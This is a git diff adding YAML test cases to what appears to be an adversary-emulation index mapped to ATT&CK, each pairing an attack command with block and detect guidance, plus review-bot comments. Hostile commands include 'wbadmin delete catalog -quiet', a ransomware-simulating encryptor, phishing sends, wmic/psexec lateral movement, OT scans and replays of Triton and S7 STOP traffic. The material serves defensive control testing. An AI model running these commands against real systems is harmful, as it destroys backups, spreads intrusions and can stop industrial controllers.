+guidance:
+block:
+- ''
+detect:
+- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+ id: 45591791-541b-4a27-bda9-75e6d78a66f4
+ tid: T1484.001
+ tactic: TA0005
+ x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+ isv: 1
diff --git a/ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
new file mode 100644
index 0000000..f6c2e88
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
@@ -0,0 +1,20 @@
+name: Encrypt a large amount of files
+description: Encrypt a large amount of files on the endpoint to simulate ransomware
+platforms:
+guidance:
+- cmd> coldcryptor.exe run {{ extension }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Detect common ransomware extensions using file system telemetry
+controls:
+- Endpoint Protection
+metadata:
+ id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ tid: T1486
+ tactic: TA0040
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+ x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ isv: 1
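Review bot: `Configure auditing on group policy objects` leaves the reader to work out what to configure; for Active Directory that means enabling the Directory Service Changes audit subcategory and setting a SACL on the Group Policy container (`CN=Policies,CN=System,<domain>`) so that edits surface as Event ID 5136/5137 on the domain controller, with file auditing on the SYSVOL policy folder as a complement since the policy files themselves land there. Suggest the detect item read `Enable Directory Service Changes auditing with a SACL on the Group Policy container so GPO modifications generate Event ID 5136 on domain controllers; alert on changes by unexpected principals or outside change windows`. The `block` entry is an empty string; restricting GPO write permissions to a tiered administrative group through delegation is a concrete preventive control that belongs there. The file is under `techniques/Impact/` while `tactic: TA0005` (Defense Evasion) is what ATT&CK assigns to T1484.001, so the directory rather than the tactic is the inconsistent part.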
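Review bot: The guidance invokes `coldcryptor.exe` while `x_tools` (and the REQUIREMENTS file in this commit) point at the `coldencryptor` directory of the payload_resources repository; one of the two names looks like a typo, and a tester copying the command will not find a binary under the other name, so the two should be reconciled. The second detect item relies on file-system telemetry being evaluated somewhere, yet `controls` lists only `Endpoint Protection`; if that detection is meant to be scored in the SIEM as the other Impact entries do, add `- SIEM` under `controls`. Because the description asks to encrypt a large amount of files, the guidance should also state where the encryption is scoped, e.g. `- Run only against a dedicated test directory seeded with sample files; never against user or production data`.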
diff --git a/ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml b/ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml
new file mode 100644
index 0000000..1cd582d
--- /dev/null
+++ b/ot-index-2024/techniques/Impact/99c34e6d-c82a-48b8-88ea-7453f98ee561.yml
@@ -0,0 +1,20 @@
+name: Delete backup catalogs with wbadmin.exe
+description: Delete native Windows backups
+platforms:
+- windows
+guidance:
+- CMD> wbadmin delete catalog -quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 99c34e6d-c82a-48b8-88ea-7453f98ee561
+ tid: T1490
+ tactic: TA0040
+ x_vectr_id: 99c34e6d-c82a-48b8-88ea-7453f98ee561
+ isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml b/ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
new file mode 100644
index 0000000..88fa6ed
--- /dev/null
+++ b/ot-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
@@ -0,0 +1,17 @@
+name: Attachment - Macro
+description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+platforms:
+guidance:
+- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+ id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml b/ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
new file mode 100644
index 0000000..c65d238
--- /dev/null
+++ b/ot-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml
@@ -0,0 +1,17 @@
+name: Link - Zipped DLL via sharing
+description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service
+platforms:
+guidance:
+- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+ id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+ tid: T1566.002
+ tactic: TA0001
+ x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617
+ isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
new file mode 100644
index 0000000..daf292b
--- /dev/null
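Review bot: The guidance for `Link - Zipped DLL via sharing` is a verbatim copy of the attachment test case: it passes `-Attachments {{ attachment }}` although this entry is T1566.002, where the payload is a cloud-storage share link in the message body and nothing should be attached, so a tester following it would exercise the wrong control. Suggest `- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body_with_share_link }} -To {{ target }} -From {{ from }}`. The block item already distinguishes rewriting from stripping the link; it would help to state that a rewritten link which still delivers the zip on click counts as a miss, since "rewritten" alone does not tell the tester how to score the outcome.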
+++ b/ot-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
@@ -0,0 +1,16 @@
+name: Prompt a user with multiple MFA requests
+description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+platforms:
+guidance:
+block:
+- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+detect:
+- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+controls:
+- IdP
+metadata:
+ id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ tid: T1621
+ tactic: TA0006
+ x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+ isv: 1
diff --git a/ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
new file mode 100644
index 0000000..1eae23d
--- /dev/null
+++ b/ot-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
@@ -0,0 +1,17 @@
+name: Attachment - ISO
+description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+ id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+ isv: 1
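Review bot: The only `block` item (deny sign-ins with an anomalous geolocation or device fingerprint) is a generic risk-based control and does not address the push-fatigue technique itself; the mitigation specific to T1621 is removing the one-tap approval, i.e. requiring number matching or additional context in the authenticator app, or moving the user to a phishing-resistant factor. Suggest adding `- Require number matching / additional context for push notifications, or a phishing-resistant MFA method, so a prompt cannot be approved without information only the legitimate sign-in possesses`. The detect item could name the concrete signal that `Identity Threat Protection` products surface, namely repeated MFA denials or timeouts for one user from one source in the IdP sign-in log. The file sits under `InitialAccess/` but `tactic: TA0006` (Credential Access) is ATT&CK's mapping for T1621, so the directory rather than the tactic is the inconsistent part.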
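Review bot: The `block` item in `Attachment - ISO` was copied from the link test case (`link inside email rewritten/stripped`), but this entry sends an ISO attachment, so it should read `Malicious email blocked/quarantined or attachment inside email stripped by email gateway` as the macro attachment entry does. The description's claim that ISO files bypass mark-of-the-web is dated: Windows updates from late 2022 propagate MOTW to files inside mounted ISO images, so it should be hedged (`historically used to bypass ...`) and the expected result on patched hosts stated, otherwise a correct outcome may be recorded as a control failure. In the guidance, `-From {{ noreply@maildomain }}` embeds a literal address inside the template placeholder where the sibling entries use `{{ from }}`; it looks like a leftover from a filled-in copy.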
diff --git a/ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
new file mode 100644
index 0000000..775b96d
--- /dev/null
+++ b/ot-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
@@ -0,0 +1,20 @@
+name: Lateral Movement via RDP
+description: Perform an interactive logons to a Windows system via RDP
+platforms:
+- windows
+guidance:
+- CMD> mstsc /v:{{ target }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+ id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+ tid: T1021.001
+ tactic: TA0008
+ x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+ isv: 1
diff --git a/ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
new file mode 100644
index 0000000..807596c
--- /dev/null
+++ b/ot-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
@@ -0,0 +1,23 @@
+name: Lateral Movement via WMI
+description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+platforms:
+- windows
+guidance:
+- CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+ id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+ tid: T1021.003
+ tactic: TA0008
+ x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+ isv: 1
diff --git a/ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
new file mode 100644
index 0000000..508dc52
--- /dev/null
+++ b/ot-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
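Review bot: The guidance depends on `wmic.exe`, which Microsoft has deprecated and which recent Windows 11 builds no longer install by default, so the test can fail for reasons unrelated to the control being evaluated; suggest adding an equivalent that does not need wmic, e.g. `- PS> Invoke-CimMethod -ComputerName {{ target }} -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine='{{ command }}'}`. The detect items name only generic endpoint behaviour and authentication events (4624/4648); the artefact specific to this technique is the spawned process on the target having `WmiPrvSE.exe` as its parent, which is worth listing so the entry can be scored against a targeted analytic rather than a generic one.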
@@ -0,0 +1,24 @@
+name: Lateral Movement via PsExec
+description: Move to another system by creating a service remotely via Sysinternals PsExec
+platforms:
+- windows
+guidance:
+- CMD> psexec -s \{{ target }} {{ command }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+ id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ tid: T1021.002
+ tactic: TA0008
+ x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+ isv: 1
diff --git a/ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml b/ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml
new file mode 100644
index 0000000..c7c2a4e
--- /dev/null
+++ b/ot-index-2024/techniques/OT/0abf446d-3422-4b78-a029-a3485be7be2f.yml
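Review bot: The guidance `psexec -s \{{ target }} {{ command }}` has a single backslash before the target; PsExec expects a UNC-style `\\computer` argument, so the command as written will not resolve the host (the second backslash was likely lost to escaping when the YAML was produced). Suggest `- CMD> psexec -s \\{{ target }} {{ command }}`. For detection, the artefact characteristic of this test is the `PSEXESVC` service being installed on the target (System log Event ID 7045, or Security 4697 when Security System Extension auditing is enabled) together with `PSEXESVC.exe` written to the ADMIN$ share; naming it would tie the detect list to this technique rather than to generic remote-access anomalies.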
@@ -0,0 +1,18 @@
+name: Lateral movement via remote service to OT system
+description: Move laterally to another system using a remote service (e.g. SSH, RDP)
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: 0abf446d-3422-4b78-a029-a3485be7be2f
+ tid: T1021
+ tactic: TA0008
+ x_vectr_id: 0abf446d-3422-4b78-a029-a3485be7be2f
+ isv: 1
diff --git a/ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml b/ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml
new file mode 100644
index 0000000..1fbba96
--- /dev/null
+++ b/ot-index-2024/techniques/OT/3ac5c6b7-aa22-4359-9506-c675391c8b63.yml
@@ -0,0 +1,20 @@
+name: Replay PCAP for Triton
+description: Replay a packet capture of a dangerous Triton malware to simulate the traffic for passive OT security controls
+platforms:
+guidance:
+- shell> tcpreplay -i {{ interface }} {{ pcap_file }}
+block:
+- ''
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+- Passive network security sensors detect malicious network traffic
+controls:
+- Endpoint Protection
+- SIEM
+- ID/PS
+metadata:
+ id: 3ac5c6b7-aa22-4359-9506-c675391c8b63
+ tid: T1021
+ tactic: TA0008
+ x_vectr_id: 3ac5c6b7-aa22-4359-9506-c675391c8b63
+ isv: 1
diff --git a/ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml b/ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml
new file mode 100644
index 0000000..1f1a6f3
--- /dev/null
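Review bot: In the Triton replay entry the first detect item (Windows authentication events 4624/4648 against a remote-access baseline) was carried over from the lateral-movement entries and cannot fire for a `tcpreplay` of a capture, which generates no Windows logons; only the passive-sensor item can, so the first item and `Endpoint Protection` under `controls` should be dropped to keep the scorecard honest. The mapping `tid: T1021` / `tactic: TA0008` (Remote Services) also does not describe replayed Triton/TriStation traffic; if the index can reference ICS ATT&CK a controller-targeting technique would fit better, otherwise the chosen mapping deserves a short justification. A safety caveat belongs in the guidance, because the replayed frames carry the capture's original addresses: `- Replay only on a span/tap or isolated test segment; confirm the pcap's destination IP/MAC addresses do not belong to live safety controllers`.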
+++ b/ot-index-2024/techniques/OT/594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml
@@ -0,0 +1,18 @@
+name: Transfer tool remotely to OT target
+description: Copy a payload to a remote target
+platforms:
+guidance:
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b
+ tid: T1570
+ tactic: TA0008
+ x_vectr_id: 594e3a9f-82c9-4c99-a535-9379d69d2c3b
+ isv: 1
diff --git a/ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml b/ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml
new file mode 100644
index 0000000..eba50d3
--- /dev/null
+++ b/ot-index-2024/techniques/OT/6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml
@@ -0,0 +1,20 @@
+name: Internal port scan against OT network
+description: Run internal port scan to probe for interesting OT-specific ports
+platforms:
+guidance:
+- shell> nmap -n -v --scan-delay 1 --open -Pn -sT -p 20000,44818,1089-1091,102,502,4840,80,443,34962-34964,4000 -oA {{ outfiles_name }} {{ cidr }}
+block:
+- Network security controls block source generating a large volume of connection requests
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- Firewall
+- ID/PS
+metadata:
+ id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4
+ tid: T1046
+ tactic: TA0007
+ x_references:
+ - https://github.com/ITI/ICS-Security-Tools/blob/master/protocols/PORTS.md
+ x_vectr_id: 6652690f-4b0d-4677-90b9-6a4fe3282ed4
+ isv: 1
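Review bot: The port-scan guidance already takes sensible precautions for OT (`-sT`, `--scan-delay 1`, `-Pn`, a fixed port list), but nothing in the entry says why, and a tester who "tunes" the command for speed can stall or crash fragile controller network stacks; suggest a guidance line stating the constraint explicitly, e.g. `- Keep full TCP connects and the scan delay; do not add -sS/-sV/-O or raise the rate against OT assets, and agree the target CIDR with the asset owner beforehand`. The detect item keys on connection volume, which a 1-second-per-probe scan across a small OT CIDR may never reach; an ID/PS signature for OT protocol probes (for example a Modbus or EtherNet/IP connect from a non-engineering host) is the detection more likely to fire at this rate and is worth listing alongside the volume-based one.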
diff --git a/ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml b/ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml
new file mode 100644
index 0000000..9af563a
--- /dev/null
+++ b/ot-index-2024/techniques/OT/85c528ae-0337-45c8-a413-41d59a67b924.yml
@@ -0,0 +1,18 @@
+name: MQTT C2 over TCP/1883
+description: Establish a bidirectional command-and-control connection from a managed asset to an external server on the Internet over MQTT
+platforms:
+guidance:
+block:
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+- Look for unexpected network connections, such as those using MQTT, egressing from the internal network to the Internet by using network traffic logs, such as firewall logs and flow logs
+controls:
+- Firewall
+- ID/PS
+metadata:
+ id: 85c528ae-0337-45c8-a413-41d59a67b924
+ tid: T1071
+ tactic: TA0011
+ x_vectr_id: 85c528ae-0337-45c8-a413-41d59a67b924
+ isv: 1
diff --git a/ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml b/ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml
new file mode 100644
index 0000000..3fb6416
--- /dev/null
+++ b/ot-index-2024/techniques/OT/9b542d39-29c9-4659-9756-6813426ff41b.yml
@@ -0,0 +1,17 @@
+name: Remote service login brute force for OT target
+description: Attempt to login as a user via a remote service (e.g. SSH, Telnet) using multiple passwords
+platforms:
+guidance:
+block:
+- Network security controls block source generating a large volume of connection requests
+detect:
+- Detect a large number of authentication attempts originating from a single source in a short period of time using authentication logs
+controls:
+- SIEM
+- Hardening
+metadata:
+ id: 9b542d39-29c9-4659-9756-6813426ff41b
+ tid: T1110.001
+ tactic: TA0006
+ x_vectr_id: 9b542d39-29c9-4659-9756-6813426ff41b
+ isv: 1
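Review bot: The brute-force entry lists `Hardening` as a control but neither `block` nor `detect` names the hardening that would actually stop password guessing against SSH/Telnet on an OT host: account lockout or rate limiting on the service, and disabling Telnet in favour of key-based SSH where the device supports it; suggest adding `- Account lockout / authentication rate limiting on the target service rejects repeated failed logins` under `block`. The detect item relies on "authentication logs", but many OT devices do not forward them, so a caveat that the test expects syslog (or equivalent) from the target to reach the SIEM would prevent a false control failure. The `guidance` list is empty; naming the expected tool and a safe cap on attempts (e.g. a wordlist small enough not to lock out the account for real operators) would make the test reproducible and operationally safe.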
diff --git a/ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml b/ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml
new file mode 100644
index 0000000..c0e2d9d
--- /dev/null
+++ b/ot-index-2024/techniques/OT/b7cefb21-5835-478e-8541-b09d15c11948.yml
@@ -0,0 +1,20 @@
+name: Replay PCAP for OT service command
+description: Replay a packet capture of a dangerous OT-specific service commands (e.g. S7 stop) to simulate the traffic for passive OT security controls
+platforms:
+guidance:
+- shell> tcpreplay -i {{ interface }} {{ pcap_file }}
+block:
+- ''
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+- Passive network security sensors detect anomalous network traffic
+controls:
+- Endpoint Protection
+- SIEM
+- ID/PS
+metadata:
+ id: b7cefb21-5835-478e-8541-b09d15c11948
+ tid: T1021
+ tactic: TA0008
+ x_vectr_id: b7cefb21-5835-478e-8541-b09d15c11948
+ isv: 1
diff --git a/ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml b/ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml
new file mode 100644
index 0000000..72f3ea2
--- /dev/null
+++ b/ot-index-2024/techniques/OT/db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml
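Review bot: As in the Triton replay entry, the 4624/4648 authentication-baseline detect item and the `Endpoint Protection` control cannot observe a `tcpreplay` of S7 traffic and should be removed so only the passive sensor is scored. The guidance needs an explicit safety note, because a replayed S7 STOP capture is addressed to whatever controller appears in the pcap: `- Replay only toward a span/tap or isolated test segment; verify the pcap's destination IP/MAC addresses are not live production controllers`. `tid: T1021` (Remote Services, Lateral Movement) is a loose fit for a controller stop command; if the index can reference ICS ATT&CK, a device state/shutdown technique would describe the test more accurately, and the description's `a dangerous OT-specific service commands` should read `dangerous OT-specific service commands`.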
@@ -0,0 +1,20 @@
+name: Network services scan against OT target
+description: Scan an OT system for OT-specific network services
+platforms:
+guidance:
+- shell> nmap -n -v --scan-delay 1 --open -Pn --script {{ scripts_directory }} -oA {{ outfiles_name }} {{ cidr }}
+block:
+- Network security controls block source generating a large volume of connection requests
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- Firewall
+- ID/PS
+metadata:
+ id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608
+ tid: T1046
+ tactic: TA0007
+ x_references:
+ - https://github.com/cckuailong/ICS-Protocal-Detect-Nmap-Script/tree/master
+ x_vectr_id: db4921c6-c8e6-4bcf-b4b3-dc97f6257608
+ isv: 1
diff --git a/ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
new file mode 100644
index 0000000..a58486f
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
@@ -0,0 +1,23 @@
+name: Register a new device in Azure AD
+description: Register a new device in Azure AD
+platforms:
+- azuread
+guidance:
+- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+block:
+- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+detect:
+- Detect anomalous device registration events by using Azure audit logs
+controls:
+- SIEM
+- Hardening
+metadata:
+ id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ tid: T1098.005
+ tactic: TA0003
+ x_tools:
+ - AADInternals
+ x_references:
+ - htpts://aadinternals.nom/post/prt/
+ x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+ isv: 1
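Review bot: In the device-registration entry the guidance cmdlet `Join-AADIntDeviceToAurzeAD` is misspelled; the AADInternals cmdlet is `Join-AADIntDeviceToAzureAD`, so the line as written does not run. The reference `htpts://aadinternals.nom/post/prt/` is garbled in both scheme and TLD and presumably should be `https://aadinternals.com/post/prt/`. The detect item could name the audit activity to look for (`Register device` / `Add device` in the Azure AD audit log, filtered to devices registered by users or from locations that do not normally enrol), and it is worth stating that the cmdlet needs an access token for a user with registration rights, since that determines which audit entries and which `block` outcome the tester should expect.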
diff --git a/ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
new file mode 100644
index 0000000..cd00901
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
@@ -0,0 +1,20 @@
+name: Persist via new scheduled task
+description: Persist on a system by creating a new scheduled task
+platforms:
+- windows
+guidance:
+- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ tid: T1053.005
+ tactic: TA0003
+ x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+ isv: 1
diff --git a/ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
new file mode 100644
index 0000000..d43b8c9
--- /dev/null
+++ b/ot-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
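Review bot: Event ID 4698 is only written when the `Audit Other Object Access Events` subcategory (Object Access) is enabled, which the default Windows audit policy leaves off, so the detect item should state that prerequisite or the test will look like a detection failure in environments that never configured it; suggest `Use scheduled task creation events (Event ID 4698; requires the Audit Other Object Access Events subcategory) to identify ...`. The Microsoft-Windows-TaskScheduler/Operational log (Event ID 106, task registered) is an alternative source independent of the Security audit policy, though it is itself disabled by default on many builds and should be mentioned with that caveat. The guidance creates the task as the invoking user; saying whether the intended variant runs as SYSTEM (`/ru SYSTEM`, needs admin) would make the expected event content deterministic.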
@@ -0,0 +1,20 @@
+name: Persist via new Windows service
+description: Persist on a system by creating a new service
+platforms:
+- windows
+guidance:
+- CMD> sc create {{ service_name }} binPath= "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ tid: T1543.003
+ tactic: TA0003
+ x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+ isv: 1
